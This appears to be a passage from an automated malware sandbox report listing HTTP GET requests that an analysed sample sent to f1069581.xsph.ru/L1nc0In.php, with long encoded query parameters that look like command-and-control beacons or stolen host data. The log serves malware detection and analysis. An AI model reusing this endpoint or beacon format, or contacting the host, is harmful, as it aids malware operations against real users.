NihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 